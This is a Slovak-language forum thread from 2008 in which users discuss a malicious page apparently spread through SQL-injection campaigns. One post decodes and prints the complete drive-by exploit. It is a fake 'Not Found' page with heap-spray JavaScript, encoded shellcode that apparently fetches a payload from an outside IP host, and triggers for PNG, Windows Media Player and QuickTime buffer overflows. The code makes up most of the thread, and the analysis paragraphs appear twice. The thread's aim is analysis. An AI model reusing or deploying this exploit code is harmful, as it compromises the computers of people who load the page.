Dnes som sa trosku venoval SQL Injection utokom, ktore roznasaju botnety a narazil som na zdroj. V nom je tento kod.
Ak mate chut pohrat sa, mozete to skusit
SQL Injection Attack - XSS Code
3 posts • Page 1 of 1
SQL Injection Attack - XSS Code
by admin on 15.05.2008, 07:05:05
-
admin - Site Admin
- Posts: 286
- Joined: 05.03.2008, 09:16:23
- Location: Behind my PC
Re: SQL Injection Attack - XSS Code
by majak on 15.05.2008, 18:01:40
Samotny kod je ako na prvy pohlad vidno zakodovany v base64. Po jeho rozkodovani sa na stranku vypise toto:
Uzivatelovi sa zda, ze stranka sa nenasla, avsak na pozadi sa hned spusti javascript.
Pokusa sa utocit hned troma roznymi buffer overflowmi.
Jeden je problem so spracovanim png obrazka, druhy utoci pomocou chyby vo Windows Media Player plug-inu a treti zneuziva bug v QuickTime.
Ak sa nemylim su to tieto tri zranitelnosti:
http://secunia.com/advisories/20626/
http://secunia.com/advisories/18852/
http://secunia.com/advisories/23540/
Su vyse roka stare, ale boli oznacene ako "Highly critical".
Subory pouzite pri utokoch su v prilozenom archive, ale nie je na nich asi nic zaujimave.
Neviem presne ako funguje buffer overflow, ale vyzera to tak, ze payload ktory sa po preteceni ma vykonat je vlozeny do jedneho velkeho pola, na ktore sa kazde dve sekundy javascript pozrie (funkciou h(), hned na zaciatku.).
Co presne dany binarny kod robi som nezistoval.
Ak ma niekto viete doplnit, potesim sa.
- Code: Select all
<html> <head> <script language="JavaScript">
var mm = new Array();
var mem_flag = 0;
function h() {
mm = mm;
a = 1;
setTimeout("h()", 2000);
}
function getb(b, bSize) {
while (b.length * 2 < bSize) {
b += b;
}
b = b.substring(0, bSize / 2);
return b;
}
function AF2HzmtWv() {
var zc = 202116108;
var a = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u362F%u2E36%u3931%u2E37%u3631%u2E38%u2F35%u6F6C%u6461%u702E%u7068%u463F%u0046");
var heapBlockSize = 4194304;
var pls = a.length * 2;
var bSize = heapBlockSize - (pls + 56);
var b = unescape("%u0c0c%u0c0c");
b = getb(b, bSize);
heapBlocks = (zc - 4194304) / heapBlockSize;
for (i = 0; i < heapBlocks; i++) {
mm[i] = b + a;
}
mem_flag = 1;
h();
return mm;
}
function vLykRiIyjlPO(num) {
if (num == 0) {
try {
pnghtml = "<embed autostart=\"true\" src=\"buf.png\" type=\"video/x-ms-wmv\" width=\"1\" height=\"1\" controls=\"ImageWindow\" console=\"cons\"></EMBED>";
if (!mem_flag) {
AF2HzmtWv();
}
document.getElementById("SGbyXZV").innerHTML = pnghtml;
num = 255;
} catch (e) {
}
if (num = 255) {
setTimeout("vLykRiIyjlPO(1)", 2000);
} else {
vLykRiIyjlPO(1);
}
} else if (num == 1) {
try {
emhtml = "<EMBED width=\"1\" height=\"1\" SRC=\"----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAA\x05NNNNOOOOAAA\x05QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv\"></EMBED>";
if (!mem_flag) {
AF2HzmtWv();
}
document.getElementById("SGbyXZV").innerHTML = emhtml;
num = 255;
} catch (e) {
}
if (num = 255) {
setTimeout("vLykRiIyjlPO(2)", 2000);
} else {
vLykRiIyjlPO(2);
}
} else if (num == 2) {
try {
var qthtml = "<EMBED SRC=\"qt.php\" WIDTH=\"10\" HEIGHT=\"10\" TYPE=\"video/quicktime\" />";
if (!mem_flag) {
AF2HzmtWv();
}
document.getElementById("SGbyXZV").innerHTML = qthtml;
num = 255;
} catch (e) {
}
}
}
</script> </head> <body onload="vLykRiIyjlPO(0)"> <div id="SGbyXZV"></div> <H1>Not Found</H1><P>The requested URL / was not found on this server.</P> </body> </html>
Uzivatelovi sa zda, ze stranka sa nenasla, avsak na pozadi sa hned spusti javascript.
Pokusa sa utocit hned troma roznymi buffer overflowmi.
Jeden je problem so spracovanim png obrazka, druhy utoci pomocou chyby vo Windows Media Player plug-inu a treti zneuziva bug v QuickTime.
Ak sa nemylim su to tieto tri zranitelnosti:
http://secunia.com/advisories/20626/
http://secunia.com/advisories/18852/
http://secunia.com/advisories/23540/
Su vyse roka stare, ale boli oznacene ako "Highly critical".
Subory pouzite pri utokoch su v prilozenom archive, ale nie je na nich asi nic zaujimave.
Neviem presne ako funguje buffer overflow, ale vyzera to tak, ze payload ktory sa po preteceni ma vykonat je vlozeny do jedneho velkeho pola, na ktore sa kazde dve sekundy javascript pozrie (funkciou h(), hned na zaciatku.).
Co presne dany binarny kod robi som nezistoval.
Ak ma niekto viete doplnit, potesim sa.
- majak
- Posts: 7
- Joined: 06.03.2008, 10:25:13
Re: SQL Injection Attack - XSS Code
by admin on 15.05.2008, 19:08:48
velice nice rozbor, ako ostatne vzdy 
-
admin - Site Admin
- Posts: 286
- Joined: 05.03.2008, 09:16:23
- Location: Behind my PC
3 posts • Page 1 of 1
Who is online
Users browsing this forum: No registered users and 0 guests
